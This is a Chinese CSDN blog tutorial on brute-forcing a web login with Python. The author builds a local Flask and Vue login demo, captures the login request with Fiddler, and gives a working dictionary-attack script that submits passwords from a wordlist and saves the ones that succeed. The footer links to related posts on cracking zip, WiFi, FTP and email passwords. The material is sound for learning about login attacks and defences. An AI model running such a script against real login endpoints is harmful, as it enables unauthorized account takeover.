python如何实现简单的暴力破解

最新推荐文章于 2024-08-15 01:55:01 发布
最新推荐文章于 2024-08-15 01:55:01 发布
阅读量962 收藏 17
点赞数 11
分类专栏: python 文章标签: python 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43305645/article/details/140792938
版权

项目简介

该项目的核心是实现简单网页端的密码破解,主要是为了给没有基础的人,提供一个思路,了解这方面的攻防原理,实际用途不大,现在大部分有三代四代验证码,还有一些加密算法等,并不会像文章中这么简单的实现直接跑字典而获取密码。

 文章内的前后端是特意写的,需要源码的话,我到时候会把前后端放在文章底部。但这里源码的具体内容我不会进行讲解。

--------

项目实施步骤

环境配置

运行前后端文件,我的后端python版本为3.11.4

前端用的vue2+axios

---------

项目演示

-------

相关解释

先大致看下前后端的代码

后端:

from flask import Flask, request, jsonify
from flask_cors import CORS
import pymysql

app = Flask(__name__)
CORS(app)

# 填写相应的数据库信息,,,
ConSql = pymysql.connect(host='数据库地址',
                       user='账号',
                       password='密码',
                       db='数据库名称',
                       charset='utf8mb4',
                       cursorclass=pymysql.cursors.DictCursor)

@app.route('/login', methods=['POST'])
def login():
    username = request.json['username']
    password = request.json['password']
    with ConSql.cursor() as cursor:
        sql = "SELECT * FROM login WHERE username = %s AND password = %s"
        cursor.execute(sql, (username, password))
        result = cursor.fetchone()
        if result:
            return jsonify({'status': 'success', 'message': '登录成功'})
        else:
            return jsonify({'status': 'error', 'message': '用户名或密码错误'})
if __name__ == '__main__':
    app.run(debug=True)

前端:


<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>一夕千念_登录暴力破解demo</title>
    <!-- 这里使用vue2.0方便调用 -->
    <script src="vue.js"></script>
    <!-- axios -->
    <script src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>
    <style>
        .bd{
            margin-top: 10%;
            width: 100%;
            height: 100%;
            background-color: #f5f5f5;
            display: flex;
            align-items: center;
            justify-content: center;
        }
        label {
            display: inline-block;
            width: 100px;
            margin-top: 5px;
            /* padding-left: 50px; */
            /* text-align: left; */
        }
        .login {
            /* margin-top: 150px; */
            text-align: center;
            
        }
        
        .login_bt {
            margin-top: 10px;
        }
</style>
</head>
<body>
    <div id="app" class="bd">
        <div class="login">
            <h2>python实现密码暴力破解testPage</h2>
            <h4>微信公众号关注“听说爱情很美”</h4>
            <div class="user">
                <label for="">用户名:</label><input type="text" v-model="username">
            </div>
            <div class="password">
                <label for="">密码:</label><input type="password" v-model="password">
            </div>
            <!-- 输出登录结果 -->
            <div class="tets_status">
                {{ test_status}}
            </div>
            <div class="login_bt">
                <button @click="update">登录</button>
            </div>
        </div>
    </div>
    
    

<script>
    var app = new Vue ({
        el : '#app',
        data:{
            username:'',
            password:'',
            test_status:''
        },
        methods: {
            update(){
                axios.post('http://127.0.0.1:5000/login',{
                    username:this.username,
                    password:this.password
                }).then(res=>{
                    // this.test_status = res.data.status
                    if (res.data.status == 'error') {
                        this.test_status = '登录失败,请检查账号或密码是否正确';
                    } else if (res.data.status == 'success') {
                        this.test_status = '登录成功'
                    }
                    
                    // console.log(test_status);
                    console.log(res.data)
                })
            }
        }
    })
</script>
</body>
</html>

爆破脚本:


import requests
import json

url = "http://127.0.0.1:5000/login"
'''

单次测试
先判断单独写上传点能否上传成功
可以的话,在写后面跑字典的操作

'''
data = {
    "username":"admin", 
    "password":"123456"
    }

'''
开始跑字典,查看是否可行。
'''
# 打开字典文件
with open('password.txt','r') as file:
    # 写一个新的数据提交,先把密码为空,后面将字典赋值给这里的密码
    datapwd = {
        "username":"admin", 
        "password":""
    }
    # 循环提交,正式跑字典
    for pwd in file:
        datapwd['password'] = pwd.strip()
        req = requests.post(url, json=datapwd,headers={"Content-Type":"application/json"})
        json_data = json.loads(req.text)
        # 当返回的json的status的值为success时候,单独输出在txt文件中
        if json_data['status'] == 'success':
            # print('password:'+datapwd["password"]+':\n',req.text)
            file = open('success.txt','a')
            file.write('password:'+datapwd["password"]+':\n'+req.text+'\n')
            file.close()
        # 输出返回结果
        print('password:'+datapwd["password"]+':\n',req.text)

--------

具体分析:

这里用到两个工具:

fiddler(抓包软件);

精易编程助手(api调用,重发软件);

这里用到的软件都是可以找到其他替换品的,只要能实现这两个功能就行了。

开始分析:

打开fiddler与前端界面

图片

点击开始抓包后,随便输个密码

图片

找到这关于相关数据包的数据(因为我们本地用的就是这个5000端口,所以直接看这个,如果是实际环境中,应该找相关域名或者公网地址)

图片

看到相关的返回值。

图片

这里看到提交的密码信息

这样一个基本的提交包就找到了,接下来进行重发包测试

图片

这里将密码改成其他的值,然后发送请求,查看返回结果

图片

OK,这里基本就没问题了,开始写脚本代码,实现将txt中的密码大全,一个一个提交,获取返回结果。

先构造单次发送的代码

图片

查看结果

图片

OK,接下来开始测试跑字典,我这里随便在txt中写了几个密码,中间已经包含正确的密码

图片

图片

运行脚本,查看返回结果

图片

发现可以找到成功的返回值

图片

但是这里有个问题,就是无法显示对应的密码是什么,并且还要手动去找success,这不对,这肯定不符合我的预期,继续改。

优化一下输出结果,找到对应的password对应的结果,并且把success的结果单独拿出来。

图片

再次运行查看结果

图片

 

 

密码为jiawen.

去前端测试查看

OK,这样一个字典爆破密码的脚本就出来了。

其实还有很多方法可以实现,我记得我很早之前就写过一种方法

【超简单!】三步教会你暴力破解!

可以参考一下。

微信公众号关注“听说爱情很美”后台回复“pj”可以获取源码

一夕千念.
关注
  • 11
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql破密码脚本
03-30
mysql破密码脚本
使用python暴力破解zip压缩包的密码
Jackey_Song的博客
02-26 1万+
使用python暴力破解zip压缩包的密码
Python暴力破解密码
热门推荐
we chat:玩转测试开发
02-13 1万+
简介:暴力破解密码的方式一般是枚举法进行破译尝试,通过一次次不同的输入尝试从而得出最终的密码,所以密码的长度和复杂性就尤为重要。本文仅以范例,警示大家在创建密码的时候,应当尽量选择组合复杂度高的,有一定长度的密码,而不是123456之类的简单密码。 破的思路: 1、获取目标密码长度,一般为4,6,12,15,18位长度。 2、获取目标密码组成的范围,一般为数字,小写字母,大写字母,特殊符号 3、组装密码,通过itertools模块组装。Python:常见排列组合问题处理 4、枚举破译。 例如生活中最常见的
python暴力破解压缩包密码(python暴力破解zip压缩包)
jakelihua
02-03 1万+
python暴力破解压缩包密码(python暴力破解zip压缩包)
python暴力破解密码
m0_72398286的博客
09-03 4210
【代码】python暴力破解密码
Python暴力破解密码 - 压缩包、web实战
we chat:玩转测试开发
11-08 5379
常规情况下,由于web自身的服务资源,带宽,吞吐率的原因,存在访问上线的情况,这和极端情况下本地直接即时访问,即时反馈的机制是完全不可等同的。另外暴力破解密码这种行为本身就是一个徘徊为灰色地带的,并且条件极其苛刻的情况下才有可能使用得上,这也是为了极少存在通过暴力破解密码从而找回或者攻陷入口的原因。4、执行结果:即只需要27秒左右即可破6位数字密码的zip密码包。1、创建一个web服务并创建密码,运行。1、创建一个zip包,并设置是需要密码。2、手动压的时候,确认是需要密码的。
python实现暴力破解.py
06-18
使用python简单实现dvwa中的暴力破解,该代码仅用于学习,禁止赖用,不得用于违法活动。
Python实现在线暴力破解邮箱账号密码功能示例【测试可用】
01-20
本文实例讲述了Python实现在线暴力破解邮箱账号密码功能。分享给大家供大家参考,具体如下: dic 字典格式如下(mail.txt) : username@gmail.com:password username@gmail.com:password username@gmail.com:password...
python编写暴力破解FTP密码小工具
01-20
python具体强大的库文件,很多功能都有相应的库文件,所以很有必要进行学习一下,其中有一个ftp相应的库文件ftplib,我们只需要其中的登录功能,然后利用多线程调用相应字典里面的字段进行登录,还能根据自己的需要...
python编写暴力破解zip文档程序的实例讲
12-25
编写暴力破解Zip文件要从学习zipfile库的使用方法入手,首先打开Python释器,用help(‘zipfile’)命令来了这个库并重点看一下ZipFile类中的extractall()这个方法 ZipFile extractall() 让我们来写一个脚本...
python暴力破解wifi密码
07-17
本次的专题是关于python暴力破解wifi密码,(本程序只实用于简单的wifi密码破译)原理比较简单,就是拿一个设定好的文本文件存一些八位数,再通过读取这些数据,一个个尝试输入,最终连接上wifi,前提是必须能搜索到...
Python暴力破解密码
芊樱烛渊的博客
04-22 6147
一、导入包 此处我们需要用到itertools和zipfile两个包 import itertools import zipfile 我们先来简单认识一下itertools包的简单用法 digital_list=list(itertools.permutations(['0','1','2','3','4','5','6','7','8','9'],3)) d_list=[''.join(x) for x in digital_list] print(digital_list) print(d_
Python实现压缩包密码暴力破解脚本(附代码)
winkexin的博客
06-26 5844
print("破成功,密码是:" + pas)print("破成功,密码是:" + pas)print("破成功,密码是" + pas)print(f"检测到字典里有{len(ozd)}个密码")print("破失败")print("检测到是zip压缩包")print("检测到是rar压缩包")print("正在破.....")print("正在破.....")print("检测到是7z压缩包")print("正在破.....")print("破失败")print("破失败")
python暴力破解网站登录密码脚本
anzhengxv的博客
06-15 2270
简单对靶向网站进行暴力破解简单代码,url指向url的地址,header设置请求头(此处省略了)payload设置请求参数requests.post这一行的作用是作一次get请求,响应信息被变量Response接收通过for循环进行不断尝试完成破......
3-python实现暴力破解
m0_62978778的博客
12-28 821
3、获得HTTP响应,分析响应结果,看看有没有错误提示“Username and/or password incorrect.”2、HTTP连接到需要暴破的地址。与爬虫请求request方法类似。4、如果有提示,就继续下一次循环。5、如果没有,就代表暴破成功。1、从字典读取值,生成密码
【shell】压缩包密码暴力破解脚本工具源码
软希网分享源码的博客
04-22 1480
【shell】压缩包密码暴力破解脚本工具源码
Python 实现二叉树前序,中序,后序,零基础也能看得懂
m0_67621628的博客
03-17 739
self.element = element self.l_child = l_child self.r_child = r_child class Tree(object): “”“树类”"" def init(self): self.root = Node() self.queue = [] def add_node(self, element): “”“为树添加节点”"" node = Node(element) 如果树是空的,则对根节点赋值 if self.root.element == -1: s
趣味课堂之使用Python破译密码
babyai996的博客
02-06 3523
师:如果想要python命令行来打开zip压缩包,那么首先要找到尝试打开的命令行,即压缩时使用的命令行。面对突如其来的问题,我没有回答,而是默默坐到了机房的最角落里,打开了python开发工具。不足的可以前面补0。哈哈,这不是节省时间嘛,你们上节课也学了,越简单密码破译时间越短。生:老师,我家的路由器刚好也是8位数字,我妈改了密码不让我上网,我中午回家写程序试试,看看能不能破译出来登陆路由器改个新密码,一脸坏笑的说着。师:接下来用枚举算法,使用pywifi模块,将wifi名称、密码配置进去,进行尝试。
Python】入门到放弃之第九章《字典》
最新发布
MP13537560060的博客
08-15 658
这是本系列的第九章节内容,《字典》。在Python中,字典(Dictionary)是一种内置的数据结构,用于存储键值对(key-value pairs)。字典是可变的,意味着你可以在创建字典后添加、删除或修改其中的元素。字典的键(key)必须是唯一的,并且是不可变的(即,它们必须是不可变数据类型,如字符串、数字或元组,但不能是列表或字典等可变类型)。字典的值(value)则可以是任何数据类型,包括列表、元组、字典等。以上,就是Python中字典的全部内容。
python实现凯撒密码暴力破解
07-08
对于凯撒密码暴力破解,你可以使用Python实现。下面是一个简单的示例代码: ```python def caesar_decrypt(ciphertext, shift): plaintext = "" for char in ciphertext: if char.isalpha(): if char.isupper(): plaintext += chr((ord(char) - shift - 65) % 26 + 65) else: plaintext += chr((ord(char) - shift - 97) % 26 + 97) else: plaintext += char return plaintext ciphertext = input("输入要密的密文: ") for shift in range(26): plaintext = caesar_decrypt(ciphertext, shift) print(f"Shift = {shift:>2} | Plaintext: {plaintext}") ``` 在这段代码中,`caesar_decrypt`函数用于密凯撒密码。它接受两个参数,分别是密文和偏移量。函数会遍历密文中的每个字符,将字母进行密,非字母字符保持不变。密的过程是将字符的ASCII码减去偏移量,并使用模运算确保结果在正确的范围内。 主程序部分要求用户输入密文,然后使用循环尝试所有可能的偏移量进行密,并打印出密结果。 请注意,这种暴力破解方法需要尝试所有可能的偏移量,因此在密文较长时会耗费较长时间。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值